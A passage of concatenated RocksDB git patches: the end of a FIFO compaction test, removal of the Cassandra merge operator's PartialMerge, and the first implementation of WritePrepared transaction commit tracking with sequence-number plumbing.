Flush(); + ASSERT_OK(dbfull()->TEST_WaitForCompact()); + } + ASSERT_EQ(NumTableFilesAtLevel(0), 2); + for (int i = 0; i < 3; i++) { + ASSERT_EQ("NOT_FOUND", Get("key" + ToString(i))); + } +} + // Check that FIFO-with-TTL is not supported with max_open_files != -1. TEST_F(DBTest, FIFOCompactionWithTTLAndMaxOpenFilesTest) { Options options; From 132306fbf00b67a6a776dc4b4ebb8198c5a4f490 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Tue, 15 Aug 2017 14:54:41 -0700 Subject: [PATCH 117/205] Remove PartialMerge implementation from Cassandra merge operator Summary: `PartialMergeMulti` implementation is enough for Cassandra, and `PartialMerge` is not required. Implementing both will just duplicate the code. As per https://github.com/facebook/rocksdb/blob/master/include/rocksdb/merge_operator.h#L130-L135 : ``` // The default implementation of PartialMergeMulti will use this function // as a helper, for backward compatibility. Any successor class of // MergeOperator should either implement PartialMerge or PartialMergeMulti, // although implementing PartialMergeMulti is suggested as it is in general // more effective to merge multiple operands at a time instead of two // operands at a time. ``` Closes https://github.com/facebook/rocksdb/pull/2737 Reviewed By: scv119 Differential Revision: D5633073 Pulled By: sagar0 fbshipit-source-id: ef4fa102c22fec6a0175ed12f5c44c15afe3c8ca --- utilities/cassandra/merge_operator.cc | 21 --------------------- utilities/cassandra/merge_operator.h | 6 ------ 2 files changed, 27 deletions(-) diff --git a/utilities/cassandra/merge_operator.cc b/utilities/cassandra/merge_operator.cc index 3c9cb7f740b..715ef8586ab 100644 --- a/utilities/cassandra/merge_operator.cc +++ b/utilities/cassandra/merge_operator.cc @@ -47,27 +47,6 @@ bool CassandraValueMergeOperator::FullMergeV2( return true; } -// Implementation for the merge operation (merges two Cassandra values) -bool CassandraValueMergeOperator::PartialMerge(const Slice& key, - const Slice& left_operand, - const Slice& right_operand, - std::string* new_value, - Logger* logger) const { - // Clear the *new_value for writing. - assert(new_value); - new_value->clear(); - - std::vector row_values; - row_values.push_back(RowValue::Deserialize(left_operand.data(), - left_operand.size())); - row_values.push_back(RowValue::Deserialize(right_operand.data(), - right_operand.size())); - RowValue merged = RowValue::Merge(std::move(row_values)); - new_value->reserve(merged.Size()); - merged.Serialize(new_value); - return true; -} - bool CassandraValueMergeOperator::PartialMergeMulti( const Slice& key, const std::deque& operand_list, diff --git a/utilities/cassandra/merge_operator.h b/utilities/cassandra/merge_operator.h index edbf120015f..679474075e5 100644 --- a/utilities/cassandra/merge_operator.h +++ b/utilities/cassandra/merge_operator.h @@ -20,12 +20,6 @@ class CassandraValueMergeOperator : public MergeOperator { virtual bool FullMergeV2(const MergeOperationInput& merge_in, MergeOperationOutput* merge_out) const override; - virtual bool PartialMerge(const Slice& key, - const Slice& left_operand, - const Slice& right_operand, - std::string* new_value, - Logger* logger) const override; - virtual bool PartialMergeMulti(const Slice& key, const std::deque& operand_list, std::string* new_value, From eb6425303eb2474009a1a3a4857d7e49ccd19820 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 16 Aug 2017 16:49:11 -0700 Subject: [PATCH 118/205] Update WritePrepared with the pseudo code Summary: Implement the main body of WritePrepared pseudo code. This includes PrepareInternal and CommitInternal, as well as AddCommitted which updates the commit map. It also provides a IsInSnapshot method that could be later called form the read path to decide if a version is in the read snapshot or it should other be skipped. This patch lacks unit tests and does not attempt to offer an efficient implementation. The idea is that to have the API specified so that we can work on related tasks in parallel. Closes https://github.com/facebook/rocksdb/pull/2713 Differential Revision: D5640021 Pulled By: maysamyabandeh fbshipit-source-id: bfa7a05e8d8498811fab714ce4b9c21530514e1c --- db/db_impl.h | 8 +- db/db_impl_write.cc | 33 ++- db/snapshot_impl.h | 4 +- db/write_batch.cc | 1 + utilities/blob_db/blob_db_impl.cc | 2 +- .../transactions/optimistic_transaction.cc | 11 +- .../transactions/optimistic_transaction.h | 4 +- .../transactions/pessimistic_transaction.cc | 35 ++-- .../transactions/pessimistic_transaction.h | 4 +- .../pessimistic_transaction_db.cc | 198 +++++++++++++++++- .../transactions/pessimistic_transaction_db.h | 105 +++++++++- .../transactions/transaction_lock_mgr.cc | 12 +- utilities/transactions/write_prepared_txn.cc | 47 ++++- utilities/transactions/write_prepared_txn.h | 12 +- 14 files changed, 404 insertions(+), 72 deletions(-) diff --git a/db/db_impl.h b/db/db_impl.h index 31d69a97041..39c1d6103f9 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -616,16 +616,18 @@ class DBImpl : public DB { Status WriteImpl(const WriteOptions& options, WriteBatch* updates, WriteCallback* callback = nullptr, uint64_t* log_used = nullptr, uint64_t log_ref = 0, - bool disable_memtable = false); + bool disable_memtable = false, uint64_t* seq_used = nullptr); Status PipelinedWriteImpl(const WriteOptions& options, WriteBatch* updates, WriteCallback* callback = nullptr, uint64_t* log_used = nullptr, uint64_t log_ref = 0, - bool disable_memtable = false); + bool disable_memtable = false, + uint64_t* seq_used = nullptr); Status WriteImplWALOnly(const WriteOptions& options, WriteBatch* updates, WriteCallback* callback = nullptr, - uint64_t* log_used = nullptr, uint64_t log_ref = 0); + uint64_t* log_used = nullptr, uint64_t log_ref = 0, + uint64_t* seq_used = nullptr); uint64_t FindMinLogContainingOutstandingPrep(); uint64_t FindMinPrepLogReferencedByMemTable(); diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index b93dd6f8faa..512819772ea 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -60,7 +60,7 @@ Status DBImpl::WriteWithCallback(const WriteOptions& write_options, Status DBImpl::WriteImpl(const WriteOptions& write_options, WriteBatch* my_batch, WriteCallback* callback, uint64_t* log_used, uint64_t log_ref, - bool disable_memtable) { + bool disable_memtable, uint64_t* seq_used) { if (my_batch == nullptr) { return Status::Corruption("Batch is nullptr!"); } @@ -79,12 +79,12 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, if (concurrent_prepare_ && disable_memtable) { return WriteImplWALOnly(write_options, my_batch, callback, log_used, - log_ref); + log_ref, seq_used); } if (immutable_db_options_.enable_pipelined_write) { return PipelinedWriteImpl(write_options, my_batch, callback, log_used, - log_ref, disable_memtable); + log_ref, disable_memtable, seq_used); } PERF_TIMER_GUARD(write_pre_and_post_process_time); @@ -127,6 +127,9 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, if (log_used != nullptr) { *log_used = w.log_used; } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } // write is complete and leader has updated sequence return w.FinalStatus(); } @@ -278,6 +281,9 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, write_options.ignore_missing_column_families, 0 /*log_number*/, this, true /*concurrent_memtable_writes*/); } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } } } } @@ -325,7 +331,7 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, Status DBImpl::PipelinedWriteImpl(const WriteOptions& write_options, WriteBatch* my_batch, WriteCallback* callback, uint64_t* log_used, uint64_t log_ref, - bool disable_memtable) { + bool disable_memtable, uint64_t* seq_used) { PERF_TIMER_GUARD(write_pre_and_post_process_time); StopWatch write_sw(env_, immutable_db_options_.statistics.get(), DB_WRITE); @@ -440,6 +446,9 @@ Status DBImpl::PipelinedWriteImpl(const WriteOptions& write_options, write_thread_.ExitAsMemTableWriter(&w, *w.write_group); } } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } assert(w.state == WriteThread::STATE_COMPLETED); return w.FinalStatus(); @@ -447,7 +456,8 @@ Status DBImpl::PipelinedWriteImpl(const WriteOptions& write_options, Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, WriteBatch* my_batch, WriteCallback* callback, - uint64_t* log_used, uint64_t log_ref) { + uint64_t* log_used, uint64_t log_ref, + uint64_t* seq_used) { Status status; PERF_TIMER_GUARD(write_pre_and_post_process_time); WriteThread::Writer w(write_options, my_batch, callback, log_ref, @@ -464,6 +474,9 @@ Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, if (log_used != nullptr) { *log_used = w.log_used; } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } return w.FinalStatus(); } // else we are the leader of the write batch group @@ -509,6 +522,13 @@ Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, // wal_write_mutex_ to ensure ordered events in WAL status = ConcurrentWriteToWAL(write_group, log_used, &last_sequence, 0 /*total_count*/); + auto curr_seq = last_sequence + 1; + for (auto* writer : write_group) { + if (writer->CheckCallback(this)) { + writer->sequence = curr_seq; + curr_seq += WriteBatchInternal::Count(writer->batch); + } + } if (status.ok() && write_options.sync) { // Requesting sync with concurrent_prepare_ is expected to be very rare. We // hance provide a simple implementation that is not necessarily efficient. @@ -527,6 +547,9 @@ Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, if (status.ok()) { status = w.FinalStatus(); } + if (seq_used != nullptr) { + *seq_used = w.sequence; + } return status; } diff --git a/db/snapshot_impl.h b/db/snapshot_impl.h index b94602f2ae5..8441050fd2c 100644 --- a/db/snapshot_impl.h +++ b/db/snapshot_impl.h @@ -76,7 +76,7 @@ class SnapshotList { // retrieve all snapshot numbers. They are sorted in ascending order. std::vector GetAll( - SequenceNumber* oldest_write_conflict_snapshot = nullptr) { + SequenceNumber* oldest_write_conflict_snapshot = nullptr) const { std::vector ret; if (oldest_write_conflict_snapshot != nullptr) { @@ -86,7 +86,7 @@ class SnapshotList { if (empty()) { return ret; } - SnapshotImpl* s = &list_; + const SnapshotImpl* s = &list_; while (s->next_ != &list_) { ret.push_back(s->next_->number_); diff --git a/db/write_batch.cc b/db/write_batch.cc index 91be9a0dfa6..43639ac2320 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -1303,6 +1303,7 @@ Status WriteBatchInternal::InsertInto(WriteThread::WriteGroup& write_group, continue; } SetSequence(w->batch, inserter.sequence()); + w->sequence = inserter.sequence(); inserter.set_log_number_ref(w->log_ref); w->status = w->batch->Iterate(&inserter); if (!w->status.ok()) { diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index a15fe4a18ab..06350b896e3 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -32,8 +32,8 @@ #include "util/random.h" #include "util/sync_point.h" #include "util/timer_queue.h" -#include "utilities/transactions/optimistic_transaction_db_impl.h" #include "utilities/transactions/optimistic_transaction.h" +#include "utilities/transactions/optimistic_transaction_db_impl.h" namespace { int kBlockBasedTableVersionFormat = 2; diff --git a/utilities/transactions/optimistic_transaction.cc b/utilities/transactions/optimistic_transaction.cc index 882fbec4a51..89d3226d5df 100644 --- a/utilities/transactions/optimistic_transaction.cc +++ b/utilities/transactions/optimistic_transaction.cc @@ -44,12 +44,9 @@ void OptimisticTransaction::Reinitialize( Initialize(txn_options); } -OptimisticTransaction::~OptimisticTransaction() { -} +OptimisticTransaction::~OptimisticTransaction() {} -void OptimisticTransaction::Clear() { - TransactionBaseImpl::Clear(); -} +void OptimisticTransaction::Clear() { TransactionBaseImpl::Clear(); } Status OptimisticTransaction::Prepare() { return Status::InvalidArgument( @@ -82,8 +79,8 @@ Status OptimisticTransaction::Rollback() { // // 'exclusive' is unused for OptimisticTransaction. Status OptimisticTransaction::TryLock(ColumnFamilyHandle* column_family, - const Slice& key, bool read_only, - bool exclusive, bool untracked) { + const Slice& key, bool read_only, + bool exclusive, bool untracked) { if (untracked) { return Status::OK(); } diff --git a/utilities/transactions/optimistic_transaction.h b/utilities/transactions/optimistic_transaction.h index b49bd6ab900..5a19489f235 100644 --- a/utilities/transactions/optimistic_transaction.h +++ b/utilities/transactions/optimistic_transaction.h @@ -29,8 +29,8 @@ namespace rocksdb { class OptimisticTransaction : public TransactionBaseImpl { public: OptimisticTransaction(OptimisticTransactionDB* db, - const WriteOptions& write_options, - const OptimisticTransactionOptions& txn_options); + const WriteOptions& write_options, + const OptimisticTransactionOptions& txn_options); virtual ~OptimisticTransaction(); diff --git a/utilities/transactions/pessimistic_transaction.cc b/utilities/transactions/pessimistic_transaction.cc index 092b7132c25..68b8b4f1a76 100644 --- a/utilities/transactions/pessimistic_transaction.cc +++ b/utilities/transactions/pessimistic_transaction.cc @@ -35,9 +35,9 @@ TransactionID PessimisticTransaction::GenTxnID() { return txn_id_counter_.fetch_add(1); } -PessimisticTransaction::PessimisticTransaction(TransactionDB* txn_db, - const WriteOptions& write_options, - const TransactionOptions& txn_options) +PessimisticTransaction::PessimisticTransaction( + TransactionDB* txn_db, const WriteOptions& write_options, + const TransactionOptions& txn_options) : TransactionBaseImpl(txn_db->GetRootDB(), write_options), txn_db_impl_(nullptr), expiration_time_(0), @@ -99,9 +99,9 @@ void PessimisticTransaction::Clear() { TransactionBaseImpl::Clear(); } -void PessimisticTransaction::Reinitialize(TransactionDB* txn_db, - const WriteOptions& write_options, - const TransactionOptions& txn_options) { +void PessimisticTransaction::Reinitialize( + TransactionDB* txn_db, const WriteOptions& write_options, + const TransactionOptions& txn_options) { if (!name_.empty() && txn_state_ != COMMITED) { txn_db_impl_->UnregisterTransaction(this); } @@ -120,9 +120,9 @@ bool PessimisticTransaction::IsExpired() const { return false; } -WriteCommittedTxn::WriteCommittedTxn( - TransactionDB* txn_db, const WriteOptions& write_options, - const TransactionOptions& txn_options) +WriteCommittedTxn::WriteCommittedTxn(TransactionDB* txn_db, + const WriteOptions& write_options, + const TransactionOptions& txn_options) : PessimisticTransaction(txn_db, write_options, txn_options){}; Status WriteCommittedTxn::CommitBatch(WriteBatch* batch) { @@ -370,7 +370,7 @@ Status PessimisticTransaction::RollbackToSavePoint() { // Lock all keys in this batch. // On success, caller should unlock keys_to_unlock Status PessimisticTransaction::LockBatch(WriteBatch* batch, - TransactionKeyMap* keys_to_unlock) { + TransactionKeyMap* keys_to_unlock) { class Handler : public WriteBatch::Handler { public: // Sorted map of column_family_id to sorted set of keys. @@ -448,8 +448,8 @@ Status PessimisticTransaction::LockBatch(WriteBatch* batch, // this key will only be locked if there have been no writes to this key since // the snapshot time. Status PessimisticTransaction::TryLock(ColumnFamilyHandle* column_family, - const Slice& key, bool read_only, bool exclusive, - bool untracked) { + const Slice& key, bool read_only, + bool exclusive, bool untracked) { uint32_t cfh_id = GetColumnFamilyID(column_family); std::string key_str = key.ToString(); bool previously_locked; @@ -535,10 +535,9 @@ Status PessimisticTransaction::TryLock(ColumnFamilyHandle* column_family, // Return OK() if this key has not been modified more recently than the // transaction snapshot_. -Status PessimisticTransaction::ValidateSnapshot(ColumnFamilyHandle* column_family, - const Slice& key, - SequenceNumber prev_seqno, - SequenceNumber* new_seqno) { +Status PessimisticTransaction::ValidateSnapshot( + ColumnFamilyHandle* column_family, const Slice& key, + SequenceNumber prev_seqno, SequenceNumber* new_seqno) { assert(snapshot_); SequenceNumber seq = snapshot_->GetSequenceNumber(); @@ -566,8 +565,8 @@ bool PessimisticTransaction::TryStealingLocks() { LOCKS_STOLEN); } -void PessimisticTransaction::UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) { +void PessimisticTransaction::UnlockGetForUpdate( + ColumnFamilyHandle* column_family, const Slice& key) { txn_db_impl_->UnLock(this, GetColumnFamilyID(column_family), key.ToString()); } diff --git a/utilities/transactions/pessimistic_transaction.h b/utilities/transactions/pessimistic_transaction.h index a0162fa279c..5c6d4d2618f 100644 --- a/utilities/transactions/pessimistic_transaction.h +++ b/utilities/transactions/pessimistic_transaction.h @@ -38,7 +38,7 @@ class PessimisticTransactionDB; class PessimisticTransaction : public TransactionBaseImpl { public: PessimisticTransaction(TransactionDB* db, const WriteOptions& write_options, - const TransactionOptions& txn_options); + const TransactionOptions& txn_options); virtual ~PessimisticTransaction(); @@ -182,7 +182,7 @@ class PessimisticTransaction : public TransactionBaseImpl { class WriteCommittedTxn : public PessimisticTransaction { public: WriteCommittedTxn(TransactionDB* db, const WriteOptions& write_options, - const TransactionOptions& txn_options); + const TransactionOptions& txn_options); virtual ~WriteCommittedTxn() {} diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 9787d76df65..156e7a12b0d 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -16,8 +16,9 @@ #include "rocksdb/options.h" #include "rocksdb/utilities/transaction_db.h" #include "util/cast_util.h" -#include "utilities/transactions/transaction_db_mutex_impl.h" +#include "util/mutexlock.h" #include "utilities/transactions/pessimistic_transaction.h" +#include "utilities/transactions/transaction_db_mutex_impl.h" namespace rocksdb { @@ -301,7 +302,8 @@ Status PessimisticTransactionDB::DropColumnFamily( return s; } -Status PessimisticTransactionDB::TryLock(PessimisticTransaction* txn, uint32_t cfh_id, +Status PessimisticTransactionDB::TryLock(PessimisticTransaction* txn, + uint32_t cfh_id, const std::string& key, bool exclusive) { return lock_mgr_.TryLock(txn, cfh_id, key, GetEnv(), exclusive); @@ -312,8 +314,8 @@ void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, lock_mgr_.UnLock(txn, keys, GetEnv()); } -void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, uint32_t cfh_id, - const std::string& key) { +void PessimisticTransactionDB::UnLock(PessimisticTransaction* txn, + uint32_t cfh_id, const std::string& key) { lock_mgr_.UnLock(txn, cfh_id, key, GetEnv()); } @@ -409,7 +411,8 @@ Status PessimisticTransactionDB::Write(const WriteOptions& opts, Transaction* txn = BeginInternalTransaction(opts); txn->DisableIndexing(); - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = + static_cast_with_check(txn); // Since commitBatch sorts the keys before locking, concurrent Write() // operations will not cause a deadlock. @@ -422,8 +425,8 @@ Status PessimisticTransactionDB::Write(const WriteOptions& opts, return s; } -void PessimisticTransactionDB::InsertExpirableTransaction(TransactionID tx_id, - PessimisticTransaction* tx) { +void PessimisticTransactionDB::InsertExpirableTransaction( + TransactionID tx_id, PessimisticTransaction* tx) { assert(tx->GetExpirationTime() > 0); std::lock_guard lock(map_mutex_); expirable_transactions_map_.insert({tx_id, tx}); @@ -449,7 +452,8 @@ bool PessimisticTransactionDB::TryStealingExpiredTransactionLocks( void PessimisticTransactionDB::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { - auto txn_impl = static_cast_with_check(txn); + auto txn_impl = + static_cast_with_check(txn); txn_impl->Reinitialize(this, write_options, txn_options); } @@ -499,5 +503,183 @@ void PessimisticTransactionDB::UnregisterTransaction(Transaction* txn) { transactions_.erase(it); } +// Returns true if commit_seq <= snapshot_seq +bool WritePreparedTxnDB::IsInSnapshot(uint64_t prep_seq, + uint64_t snapshot_seq) { + // Here we try to infer the return value without looking into prepare list. + // This would help avoiding synchronization over a shared map. + // TODO(myabandeh): read your own writes + // TODO(myabandeh): optimize this. This sequence of checks must be correct but + // not necessary efficient + if (snapshot_seq < prep_seq) { + // snapshot_seq < prep_seq <= commit_seq => snapshot_seq < commit_seq + return false; + } + if (!delayed_prepared_empty_.load(std::memory_order_acquire)) { + // We should not normally reach here + ReadLock rl(&prepared_mutex_); + if (delayed_prepared_.find(prep_seq) != delayed_prepared_.end()) { + // Then it is not committed yet + return false; + } + } + auto indexed_seq = prep_seq % COMMIT_CACHE_SIZE; + CommitEntry cached; + bool exist = GetCommitEntry(indexed_seq, &cached); + if (!exist) { + // It is not committed, so it must be still prepared + return false; + } + if (prep_seq == cached.prep_seq) { + // It is committed and also not evicted from commit cache + return cached.commit_seq <= snapshot_seq; + } + // At this point we dont know if it was committed or it is still prepared + auto max_evicted_seq = max_evicted_seq_.load(std::memory_order_acquire); + if (max_evicted_seq < prep_seq) { + // Not evicted from cache and also not present, so must be still prepared + return false; + } + // When advancing max_evicted_seq_, we move older entires from prepared to + // delayed_prepared_. Also we move evicted entries from commit cache to + // old_commit_map_ if it overlaps with any snapshot. Since prep_seq <= + // max_evicted_seq_, we have three cases: i) in delayed_prepared_, ii) in + // old_commit_map_, iii) committed with no conflict with any snapshot (i) + // delayed_prepared_ is checked above + if (max_evicted_seq < snapshot_seq) { // then (ii) cannot be the case + // only (iii) is the case: committed + // commit_seq <= max_evicted_seq_ < snapshot_seq => commit_seq < + // snapshot_seq + return true; + } + // else (ii) might be the case: check the commit data saved for this snapshot. + // If there was no overlapping commit entry, then it is committed with a + // commit_seq lower than any live snapshot, including snapshot_seq. + if (old_commit_map_empty_.load(std::memory_order_acquire)) { + return true; + } + { + // We should not normally reach here + ReadLock rl(&old_commit_map_mutex_); + auto old_commit_entry = old_commit_map_.find(prep_seq); + if (old_commit_entry == old_commit_map_.end() || + old_commit_entry->second <= snapshot_seq) { + return true; + } + } + // (ii) it the case: it is committed but after the snapshot_seq + return false; +} + +void WritePreparedTxnDB::AddPrepared(uint64_t seq) { prepared_txns_.push(seq); } + +void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, + uint64_t commit_seq) { + auto indexed_seq = prepare_seq % COMMIT_CACHE_SIZE; + CommitEntry evicted; + bool to_be_evicted = GetCommitEntry(indexed_seq, &evicted); + if (to_be_evicted) { + auto prev_max = max_evicted_seq_.load(std::memory_order_acquire); + if (prev_max < evicted.commit_seq) { + auto max_evicted_seq = evicted.commit_seq; + // When max_evicted_seq_ advances, move older entries from prepared_txns_ + // to delayed_prepared_. This guarantees that if a seq is lower than max, + // then it is not in prepared_txns_ ans save an expensive, synchronized + // lookup from a shared set. delayed_prepared_ is expected to be empty in + // normal cases. + { + WriteLock wl(&prepared_mutex_); + while (!prepared_txns_.empty() && + prepared_txns_.top() <= max_evicted_seq) { + auto to_be_popped = prepared_txns_.top(); + delayed_prepared_.insert(to_be_popped); + prepared_txns_.pop(); + delayed_prepared_empty_.store(false, std::memory_order_release); + } + } + { + WriteLock wl(&snapshots_mutex_); + InstrumentedMutex(db_impl_->mutex()); + snapshots_ = db_impl_->snapshots().GetAll(); + } + while (prev_max < max_evicted_seq && + !max_evicted_seq_.compare_exchange_weak( + prev_max, max_evicted_seq, std::memory_order_release, + std::memory_order_acquire)) { + }; + } + // After each eviction from commit cache, check if the commit entry should + // be kept around because it overlaps with a live snapshot. + { + ReadLock rl(&snapshots_mutex_); + for (auto snapshot : snapshots_) { + auto snapshot_seq = + reinterpret_cast(snapshot)->number_; + if (evicted.commit_seq <= snapshot_seq) { + break; + } + // then snapshot_seq < evicted.commit_seq + if (evicted.prep_seq <= snapshot_seq) { // overlapping range + WriteLock wl(&old_commit_map_mutex_); + old_commit_map_empty_.store(false, std::memory_order_release); + old_commit_map_[evicted.prep_seq] = evicted.commit_seq; + } + } + } + } + bool succ = + ExchangeCommitEntry(indexed_seq, evicted, {prepare_seq, commit_seq}); + if (!succ) { + // A very rare event, in which the commit entry is updated before we do. + // Here we apply a very simple solution of retrying. + // TODO(myabandeh): do precautions to detect bugs that cause infinite loops + AddCommitted(prepare_seq, commit_seq); + return; + } + { + WriteLock wl(&prepared_mutex_); + prepared_txns_.erase(prepare_seq); + bool was_empty = delayed_prepared_.empty(); + if (!was_empty) { + delayed_prepared_.erase(prepare_seq); + bool is_empty = delayed_prepared_.empty(); + if (was_empty != is_empty) { + delayed_prepared_empty_.store(is_empty, std::memory_order_release); + } + } + } +} + +bool WritePreparedTxnDB::GetCommitEntry(uint64_t indexed_seq, + CommitEntry* entry) { + // TODO(myabandeh): implement lock-free commit_cache_ + ReadLock rl(&commit_cache_mutex_); + *entry = commit_cache_[indexed_seq]; + return (entry->commit_seq != 0); // initialized +} + +bool WritePreparedTxnDB::AddCommitEntry(uint64_t indexed_seq, + CommitEntry& new_entry, + CommitEntry* evicted_entry) { + // TODO(myabandeh): implement lock-free commit_cache_ + WriteLock wl(&commit_cache_mutex_); + *evicted_entry = commit_cache_[indexed_seq]; + commit_cache_[indexed_seq] = new_entry; + return (evicted_entry->commit_seq != 0); // initialized +} + +bool WritePreparedTxnDB::ExchangeCommitEntry(uint64_t indexed_seq, + CommitEntry& expected_entry, + CommitEntry new_entry) { + // TODO(myabandeh): implement lock-free commit_cache_ + WriteLock wl(&commit_cache_mutex_); + auto& evicted_entry = commit_cache_[indexed_seq]; + if (evicted_entry.prep_seq != expected_entry.prep_seq) { + return false; + } + commit_cache_[indexed_seq] = new_entry; + return true; +} + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/pessimistic_transaction_db.h b/utilities/transactions/pessimistic_transaction_db.h index 6ff1d015a80..35c2a014330 100644 --- a/utilities/transactions/pessimistic_transaction_db.h +++ b/utilities/transactions/pessimistic_transaction_db.h @@ -8,6 +8,7 @@ #include #include +#include #include #include #include @@ -64,11 +65,12 @@ class PessimisticTransactionDB : public TransactionDB { using StackableDB::DropColumnFamily; virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override; - Status TryLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key, - bool exclusive); + Status TryLock(PessimisticTransaction* txn, uint32_t cfh_id, + const std::string& key, bool exclusive); void UnLock(PessimisticTransaction* txn, const TransactionKeyMap* keys); - void UnLock(PessimisticTransaction* txn, uint32_t cfh_id, const std::string& key); + void UnLock(PessimisticTransaction* txn, uint32_t cfh_id, + const std::string& key); void AddColumnFamily(const ColumnFamilyHandle* handle); @@ -79,7 +81,8 @@ class PessimisticTransactionDB : public TransactionDB { return txn_db_options_; } - void InsertExpirableTransaction(TransactionID tx_id, PessimisticTransaction* tx); + void InsertExpirableTransaction(TransactionID tx_id, + PessimisticTransaction* tx); void RemoveExpirableTransaction(TransactionID tx_id); // If transaction is no longer available, locks can be stolen @@ -97,14 +100,18 @@ class PessimisticTransactionDB : public TransactionDB { void GetAllPreparedTransactions(std::vector* trans) override; TransactionLockMgr::LockStatusData GetLockStatusData() override; + struct CommitEntry { + uint64_t prep_seq; + uint64_t commit_seq; + }; protected: void ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options = TransactionOptions()); + DBImpl* db_impl_; private: - DBImpl* db_impl_; const TransactionDBOptions txn_db_options_; TransactionLockMgr lock_mgr_; @@ -161,6 +168,94 @@ class WritePreparedTxnDB : public PessimisticTransactionDB { Transaction* BeginTransaction(const WriteOptions& write_options, const TransactionOptions& txn_options, Transaction* old_txn) override; + + // Check whether the transaction that wrote the value with seqeunce number seq + // is visible to the snapshot with sequence number snapshot_seq + bool IsInSnapshot(uint64_t seq, uint64_t snapshot_seq); + // Add the trasnaction with prepare sequence seq to the prepared list + void AddPrepared(uint64_t seq); + // Add the transaction with prepare sequence prepare_seq and commit sequence + // commit_seq to the commit map + void AddCommitted(uint64_t prepare_seq, uint64_t commit_seq); + + private: + // A heap with the amortized O(1) complexity for erase. It uses one extra heap + // to keep track of erased entries that are not yet on top of the main heap. + class PreparedHeap { + std::priority_queue heap_; + std::priority_queue erased_heap_; + + public: + bool empty() { return heap_.empty(); } + uint64_t top() { return heap_.top(); } + void push(uint64_t v) { heap_.push(v); } + void pop() { + heap_.pop(); + while (!heap_.empty() && !erased_heap_.empty() && + heap_.top() == erased_heap_.top()) { + heap_.pop(); + erased_heap_.pop(); + } + } + void erase(uint64_t seq) { + if (!heap_.empty()) { + if (heap_.top() < seq) { + // Already popped, ignore it. + } else if (heap_.top() == seq) { + heap_.pop(); + } else { // (heap_.top() > seq) + // Down the heap, remember to pop it later + erased_heap_.push(seq); + } + } + } + }; + + // Get the commit entry with index indexed_seq from the commit table. It + // returns true if such entry exists. + bool GetCommitEntry(uint64_t indexed_seq, CommitEntry* entry); + // Rewrite the entry with the index indexed_seq in the commit table with the + // commit entry . If the rewrite results into eviction, + // sets the evicted_entry and returns true. + bool AddCommitEntry(uint64_t indexed_seq, CommitEntry& new_entry, + CommitEntry* evicted_entry); + // Rewrite the entry with the index indexed_seq in the commit table with the + // commit entry new_entry only if the existing entry matches the + // expected_entry. Returns false otherwise. + bool ExchangeCommitEntry(uint64_t indexed_seq, CommitEntry& expected_entry, + CommitEntry new_entry); + + // The list of live snapshots at the last time that max_evicted_seq_ advanced. + // The list sorted in ascending order. Thread-safety is provided with + // snapshots_mutex_. + std::vector snapshots_; + // A heap of prepared transactions. Thread-safety is provided with + // prepared_mutex_. + PreparedHeap prepared_txns_; + // 10m entry, 80MB size + static const uint64_t COMMIT_CACHE_SIZE = static_cast(1 << 21); + // commit_cache_ is initialized to zero to tell apart an empty index from a + // filled one. Thread-safety is provided with commit_cache_mutex_. + CommitEntry commit_cache_[COMMIT_CACHE_SIZE] = {}; + // The largest evicted *commit* sequence number from the commit_cache_ + std::atomic max_evicted_seq_ = {}; + // A map of the evicted entries from commit_cache_ that has to be kept around + // to service the old snapshots. This is expected to be empty normally. + // Thread-safety is provided with old_commit_map_mutex_. + std::map old_commit_map_; + // A set of long-running prepared transactions that are not finished by the + // time max_evicted_seq_ advances their sequence number. This is expected to + // be empty normally. Thread-safety is provided with prepared_mutex_. + std::set delayed_prepared_; + // Update when delayed_prepared_.empty() changes. Expected to be true + // normally. + std::atomic delayed_prepared_empty_ = {true}; + // Update when old_commit_map_.empty() changes. Expected to be true normally. + std::atomic old_commit_map_empty_ = {true}; + port::RWMutex prepared_mutex_; + port::RWMutex old_commit_map_mutex_; + port::RWMutex commit_cache_mutex_; + port::RWMutex snapshots_mutex_; }; } // namespace rocksdb diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index d93d5bcde77..9b7a4e640d9 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -357,13 +357,15 @@ Status TransactionLockMgr::AcquireWithTimeout( } void TransactionLockMgr::DecrementWaiters( - const PessimisticTransaction* txn, const autovector& wait_ids) { + const PessimisticTransaction* txn, + const autovector& wait_ids) { std::lock_guard lock(wait_txn_map_mutex_); DecrementWaitersImpl(txn, wait_ids); } 